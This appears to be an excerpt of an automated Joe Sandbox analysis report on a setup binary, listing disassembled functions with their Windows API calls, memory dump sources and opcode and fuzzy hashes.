                                                                                                                                                                    • API String ID: 1384747822-0
                                                                                                                                                                    • Opcode ID: 84fb455d94f8ea1dce7a08f413e353b32c4de5cfa105278348a2d7713f4512ae
                                                                                                                                                                    • Instruction ID: 611d18517cb1531f490143431c7e3ec1ba7eef29b756b743d1eaed18ef419b79
                                                                                                                                                                    • Opcode Fuzzy Hash: 84fb455d94f8ea1dce7a08f413e353b32c4de5cfa105278348a2d7713f4512ae
                                                                                                                                                                    • Instruction Fuzzy Hash: E5F0123694011DCBDF04D7A8C854BEDB7746F6436CF44A61DE111B71C1DB74954ACBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBD739 Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 69DBD747
                                                                                                                                                                      • Part of subcall function 69DBFC46: __EH_prolog3.LIBCMT ref: 69DBFC4D
                                                                                                                                                                      • Part of subcall function 69DBFC46: GetLastError.KERNEL32(?,?,?,69DBCE79,00000000,69DBBCC4,?,80070057,?,InvalidArguments,?,00000000,?,ParameterInfo.xml,?,?), ref: 69DBFC73
                                                                                                                                                                    • PostMessageW.USER32(?,00000012,00000000,00000000), ref: 69DBD768
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CountErrorH_prolog3LastMessagePostTick
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1936365967-0
                                                                                                                                                                    • Opcode ID: be66bc5af2a9729a9c505e21365d0d477e4b080fb9a74df11f15862dd27d0c5a
                                                                                                                                                                    • Instruction ID: c44bd7928f3fbcb3e3467be81e66ceb13c631e28731e6913c6b6f9511337e08a
                                                                                                                                                                    • Opcode Fuzzy Hash: be66bc5af2a9729a9c505e21365d0d477e4b080fb9a74df11f15862dd27d0c5a
                                                                                                                                                                    • Instruction Fuzzy Hash: 33E092FB500646BFEB008FA488C4C66B72CFA44225310813AF51287D04C770DC519BA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F29EF Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F29F6
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DD923: __EH_prolog3.LIBCMT ref: 698DD92A
                                                                                                                                                                      • Part of subcall function 698DD923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD960
                                                                                                                                                                      • Part of subcall function 698DD923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD9BA
                                                                                                                                                                      • Part of subcall function 698DD923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDA0D
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 698F2A33
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Path$CombineFileFreeModuleNameRelativeString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2530041087-0
                                                                                                                                                                    • Opcode ID: b88a9d60098108e85b83691aa1344b1f747a612b8d2ffe55a0560a22810439e2
                                                                                                                                                                    • Instruction ID: b1e932bca0b566bc45e81570390611310d5c61047bc24aeced72ea4075c62b87
                                                                                                                                                                    • Opcode Fuzzy Hash: b88a9d60098108e85b83691aa1344b1f747a612b8d2ffe55a0560a22810439e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0AC75910219FBDF01DFA4CC08ABE7BB8FF14359F40D82DF524A6150CB359A199B51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA3AE6 Relevance: 3.0, APIs: 2, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • UnloadUserProfile.USERENV(69DA3AE6,69D6BF34,?,69DA4ABC,69D6A590,10000000,69D6A590,80000000,69D6A590,10000000,69D6A5D8,69D6A54C), ref: 69DA3AFB
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(69DA3AE6,?,69DA4ABC,69D6A590,10000000,69D6A590,80000000,69D6A590,10000000,69D6A5D8,69D6A54C), ref: 69DA3B0D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseFindNotificationProfileUnloadUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 122385185-0
                                                                                                                                                                    • Opcode ID: f0c1f5247fe3065ddfe7bb3fa1ced755ca8c8dfca704fe1ba0bbe4e04c387174
                                                                                                                                                                    • Instruction ID: 52ef86caad8b1123a279282d57b9c9a69d4c55d9639534b0f7d98658b3418c52
                                                                                                                                                                    • Opcode Fuzzy Hash: f0c1f5247fe3065ddfe7bb3fa1ced755ca8c8dfca704fe1ba0bbe4e04c387174
                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE0C231615B01DBEB288F16D949B23B7EEAF41622F11C82DA4AA87890DB75E850CB14
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D9516F Relevance: 3.0, APIs: 2, Instructions: 19libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D9517C
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D95194
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$FreeLoad
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 534179979-0
                                                                                                                                                                    • Opcode ID: f018ca782510d57e32fa4463189ac58239bf123bfd4a59012799b10b4ade5adf
                                                                                                                                                                    • Instruction ID: 4cc5cf6c8433bc458108dff44ec4d1d6181a6276c15b897ffa2ce281f80afe60
                                                                                                                                                                    • Opcode Fuzzy Hash: f018ca782510d57e32fa4463189ac58239bf123bfd4a59012799b10b4ade5adf
                                                                                                                                                                    • Instruction Fuzzy Hash: 56E0EC7A600744DBE7209F55D408A57BBE9EB85B11B00C839E96AD7910DB71F411CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DC8859 Relevance: 3.0, APIs: 2, Instructions: 17memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysStringByteLen.OLEAUT32(00000000), ref: 69DC8860
                                                                                                                                                                    • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 69DC8869
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteString$Alloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2785738885-0
                                                                                                                                                                    • Opcode ID: d05192668aa52651bff1c33c27dd66ea8f83766875b69c765c6804af6357cdbe
                                                                                                                                                                    • Instruction ID: 6bae7a9e11b2f104e21cb2493b1693c60623251a9cd999c38b784d30ee4bfaaa
                                                                                                                                                                    • Opcode Fuzzy Hash: d05192668aa52651bff1c33c27dd66ea8f83766875b69c765c6804af6357cdbe
                                                                                                                                                                    • Instruction Fuzzy Hash: B3D06775100241DBFB505FA5A808B1677ACBF05245B184A38B9A1E3954E735C490CB12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA4029 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,69DB2CF3), ref: 69DA4035
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 69DA404C
                                                                                                                                                                      • Part of subcall function 69DC89C8: GetLastError.KERNEL32(69D780E8,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 69DC89C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: BuffersChangeCloseErrorFileFindFlushLastNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4236133906-0
                                                                                                                                                                    • Opcode ID: dc46fbfa905326a51b8aaf5db1e2294424e4deb87f1210c83a2e2e6ce02cb884
                                                                                                                                                                    • Instruction ID: 24ce441e5de7623b1d3153bb05b324be6571db31e700af3f68a0e05dd509ea91
                                                                                                                                                                    • Opcode Fuzzy Hash: dc46fbfa905326a51b8aaf5db1e2294424e4deb87f1210c83a2e2e6ce02cb884
                                                                                                                                                                    • Instruction Fuzzy Hash: 5ED01731514751CBEB709F34D60AB6676F8BF41356F018E28E562D7840DBB4E8148B69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A2915 Relevance: 3.0, APIs: 2, Instructions: 8memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 009A291C
                                                                                                                                                                    • Run.SETUPENGINE ref: 009A2922
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HeapInformation
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3918721486-0
                                                                                                                                                                    • Opcode ID: 9c0aad16a663e607946613f71ff52958745664ddaee1c5a51e90edd2dda81b9a
                                                                                                                                                                    • Instruction ID: 84f1ed2b113f2e62c93cbc148f81d1645ea7e637f54ce4f960b6257e89e1f9f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c0aad16a663e607946613f71ff52958745664ddaee1c5a51e90edd2dda81b9a
                                                                                                                                                                    • Instruction Fuzzy Hash: 62B092B05341606EEA0057209C0CF37361CEB01342F000811B806C00A4C6A04880A560
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA84FF Relevance: 2.5, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794,00000000), ref: 69DA851E
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794), ref: 69DA853F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                    • Opcode ID: 96e282959a663ebf7fd7fc849800548c7bcd2231e354147737082fb4775b0018
                                                                                                                                                                    • Instruction ID: 61f865fe91d2ba1ed746da342e19d1c844152070a898d35ae39b796b57d56c5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 96e282959a663ebf7fd7fc849800548c7bcd2231e354147737082fb4775b0018
                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF09632244164BBDB119B4ACC44E9FBB2DEB96B70F108125FE28975808A70991287B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D73A16 Relevance: 1.7, APIs: 1, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
                                                                                                                                                                      • Part of subcall function 69DA8C7A: __EH_prolog3.LIBCMT ref: 69DA8C81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: fa84887ca32c3a539171e8b4a9371b4b734a7587cf93d84a1c52c53d0a1193f3
                                                                                                                                                                    • Instruction ID: f56f9462261dd75b2ca7be579bc0a78621c081b4eb28d0f08bbb79c6a49b1c4b
                                                                                                                                                                    • Opcode Fuzzy Hash: fa84887ca32c3a539171e8b4a9371b4b734a7587cf93d84a1c52c53d0a1193f3
                                                                                                                                                                    • Instruction Fuzzy Hash: 86717D76800249DFDB00DFA8C981BDDBBB4AF04328F148265E961BB7D1DB34DA54CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D941FE Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D94205
                                                                                                                                                                      • Part of subcall function 69D82771: __EH_prolog3.LIBCMT ref: 69D82778
                                                                                                                                                                      • Part of subcall function 69D94F19: __EH_prolog3.LIBCMT ref: 69D94F20
                                                                                                                                                                      • Part of subcall function 69D92081: __EH_prolog3.LIBCMT ref: 69D92088
                                                                                                                                                                      • Part of subcall function 69D7C17A: _calloc.LIBCMT ref: 69D7C1A0
                                                                                                                                                                      • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ExceptionRaise_calloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1540488672-0
                                                                                                                                                                    • Opcode ID: af50ba8920e610533ab511af642a30fc0e148b4df66a015f0f4cbe0ae4200060
                                                                                                                                                                    • Instruction ID: 13a59f6c50d28929fdb49ea980950e53f3ebc3fa6ad2a282886a243762e79988
                                                                                                                                                                    • Opcode Fuzzy Hash: af50ba8920e610533ab511af642a30fc0e148b4df66a015f0f4cbe0ae4200060
                                                                                                                                                                    • Instruction Fuzzy Hash: D351FA75900259DFCB04CFA4C580B9ABBB4BF19308F1584B9DD59AF712C770AA49CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA7889 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA7890
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DAA226: GetTickCount.KERNEL32 ref: 69DAA241
                                                                                                                                                                      • Part of subcall function 69DAA226: GetTickCount.KERNEL32 ref: 69DAA27C
                                                                                                                                                                      • Part of subcall function 69DAA226: __time64.LIBCMT ref: 69DAA282
                                                                                                                                                                      • Part of subcall function 69DAA226: InitializeCriticalSection.KERNEL32(00000040,?,69DA7905,?), ref: 69DAA292
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CountTick$CriticalH_prolog3InitializeSection__time64_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 349597444-0
                                                                                                                                                                    • Opcode ID: ac9a2eb8188bc34f4cb0ac1b6c5b1b041c0d5643d792a86f28c6d3b0bc402318
                                                                                                                                                                    • Instruction ID: 9dc629a744315d121f1d0a30022498c6aea675a662c613ced90b4959ca8ee211
                                                                                                                                                                    • Opcode Fuzzy Hash: ac9a2eb8188bc34f4cb0ac1b6c5b1b041c0d5643d792a86f28c6d3b0bc402318
                                                                                                                                                                    • Instruction Fuzzy Hash: 84519739A00604EFDB04DF78C884A6937B5FF09324B1096B9F816DB7A1CB31E925CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D859B8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D859BF
                                                                                                                                                                      • Part of subcall function 69D856A3: SysFreeString.OLEAUT32(?), ref: 69D8578A
                                                                                                                                                                      • Part of subcall function 69D856A3: SysFreeString.OLEAUT32(?), ref: 69D85799
                                                                                                                                                                      • Part of subcall function 69D856A3: SysFreeString.OLEAUT32(?), ref: 69D857C7
                                                                                                                                                                      • Part of subcall function 69DB1315: __EH_prolog3.LIBCMT ref: 69DB131C
                                                                                                                                                                      • Part of subcall function 69DB1315: _free.LIBCMT ref: 69DB137B
                                                                                                                                                                      • Part of subcall function 69DAB17C: __recalloc.LIBCMT ref: 69DAB18D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString$H_prolog3$__recalloc_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2446356840-0
                                                                                                                                                                    • Opcode ID: e03db0fc3171a8ac2aea72d0a68489580483d54264c2eac6ca1ba69ebbab77f2
                                                                                                                                                                    • Instruction ID: c980f841c656e2e3846d778d10f3cd78cc260316a4a889ddaaabd948a7611fad
                                                                                                                                                                    • Opcode Fuzzy Hash: e03db0fc3171a8ac2aea72d0a68489580483d54264c2eac6ca1ba69ebbab77f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 405114B4901209DFCB01CFA8C58069EBBF4BF29304F1085BED45AABB41D770AA45CFA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8A655 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8A65C
                                                                                                                                                                      • Part of subcall function 69D8670B: __EH_prolog3.LIBCMT ref: 69D86712
